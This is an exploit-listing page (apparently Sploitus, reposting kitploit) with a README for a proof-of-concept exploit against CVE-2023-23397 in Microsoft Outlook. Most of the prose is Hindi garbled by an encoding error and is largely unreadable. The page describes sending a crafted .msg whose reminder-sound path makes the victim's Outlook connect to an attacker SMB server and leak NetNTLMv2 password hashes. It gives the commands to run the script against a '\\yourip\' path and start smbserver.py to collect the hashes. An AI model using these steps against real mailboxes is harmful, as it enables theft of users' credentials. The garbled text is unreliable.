Sploitus

Exploit for CVE-2023-23397

kitploit ┬╖ 2026-08-26

Exploit Code

MARKDOWN52 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TRACKFLAW-CVE-2023-23397
# CVE-2023-23397

Outlook рдерд┐рдХ рдХреНрд▓рд╛рдЗрдВрдЯ рдХреЛ рдкреНрд░рднрд╛рд╡рд┐рдд рдХрд░рдиреЗ рд╡рд╛рд▓реА CVE-2023-23397 рднреЗрджреНрдпрддрд╛ рдХрд╛ рд╕рд░рд▓ рдФрд░ рдЬрд▓реНрджрдмрд╛рдЬрд╝реА рдореЗрдВ рдмрдирд╛рдпрд╛ рдЧрдпрд╛ PoCред

## рд╡рд┐рд╡рд░рдг

Outlook рдореЗрдВ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЗрдирдкреБрдЯ рдкрд░ рдирд┐рдпрдВрддреНрд░рдг рдХреА рдХрдореА рд╣реИ, рдЬреЛ рдореАрдЯрд┐рдВрдЧ рдФрд░ рдЕрдкреЙрдЗрдВрдЯрдореЗрдВрдЯ рд░рд┐рдорд╛рдЗрдВрдбрд░ рдХреА рдзреНрд╡рдирд┐ рдХреЛ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред рд╡рд╛рд╕реНрддрд╡ рдореЗрдВ, рдПрдХ рд╣рдорд▓рд╛рд╡рд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреА рдУрд░ рд╕реЗ рдХрд┐рд╕реА рднреА рд╣реЗрд░рдлреЗрд░ рдХреЗ рдмрд┐рдирд╛ (рдЬрд╝реАрд░реЛ рдХреНрд▓рд┐рдХ рднреЗрджреНрдпрддрд╛) рдкреАрдбрд╝рд┐рдд рдХреЛ рдЕрдкрдиреЗ рд╕рд░реНрд╡рд░ рд╕реЗ рдХрдиреЗрдХреНрд╢рди рдмрдирд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдордЬрдмреВрд░ рдХрд░ рд╕рдХрддрд╛ рд╣реИред

рдЗрд╕ рднреЗрджреНрдпрддрд╛ рдХрд╛ рд╢реЛрд╖рдг рдХрд░рдиреЗ рд╡рд╛рд▓рд╛ рд╣рдорд▓рд╛рд╡рд░ SMB рдЕрдиреБрд░реЛрдз рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдлрдВрд╕реЗ рд╣реБрдП рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рдкрд╛рд╕рд╡рд░реНрдб рдкрд░ рдЖрдзрд╛рд░рд┐рдд NetNTLMv2 рдбрд╛рдЗрдЬреЗрд╕реНрдЯ рдкреНрд░рд╛рдкреНрдд рдХрд░рддрд╛ рд╣реИред рдореЗрд▓ рдЗрдирдмреЙрдХреНрд╕ рдореЗрдВ рдЖрддреЗ рд╣реА рдЕрдиреБрд░реЛрдз рдЯреНрд░рд┐рдЧрд░ рд╣реЛ рдЬрд╛рддрд╛ рд╣реИред

## PoC рдХреНрдпрд╛ рдХрд░рддрд╛ рд╣реИ?

  1. `.msg` рдкреЗрд▓реЛрдб рдЙрддреНрдкрдиреНрди рдХрд░рддрд╛ рд╣реИред
  2. рдЗрд╕реЗ рдХрд╕реНрдЯрдо SMTP рд╕рд░реНрд╡рд░ рдХреЗ рд╕рд╛рде рдИрдореЗрд▓ рджреНрд╡рд╛рд░рд╛ рднреЗрдЬрддрд╛ рд╣реИред



## рдЙрдкрдпреЛрдЧ

рдПрдХ рд╕рддреНрд░ рдореЗрдВ :

root@kitploit:~
    
    
    python CVE-2023-23397.py
    
    usage: CVE-2023-23397.py [-h] -p PATH
    CVE-2023-23397.py: error: the following arguments are required: -p/--path
    
    python CVE-2023-23397.py --path '\\yourip\'
    

рджреВрд╕рд░реЗ рд╕рддреНрд░ рдореЗрдВ (`smbserver` рдпрд╛ `responder` рдЬреИрд╕рд╛ рдЖрдк рдЪрд╛рд╣реЗрдВ)ред

root@kitploit:~
    
    
    smbserver.py -smb2support SHARE .
    

## рдбреЗрдореЛ (рдореИрдиреБрдЕрд▓ PoC)

![poc](https://assets.kitploit.com/production/public/readmes/21251/5c7cb7679f9d65fef5d0d702ba074d6c0a09aaadb643ba21ffc1688ba4c191ab.gif)

## рд╡реНрдпрд╛рдЦреНрдпрд╛рддреНрдордХ рд╡реАрдбрд┐рдпреЛ (рдлреНрд░реЗрдВрдЪ рднрд╛рд╖рд╛ рдореЗрдВ)

![Microsoft Outlook рдХреЗ рд╕рд╛рде рдкрд╛рд╕рд╡рд░реНрдб рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ #CVE-2023-23397](https://assets.kitploit.com/production/public/readmes/21251/3bfb541444c1d2f183dc4af93bd36e9d065c1bed80170b490803283f21f5fbb8.jpg)

## рдореВрд▓ рд▓реЗрдЦ

https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/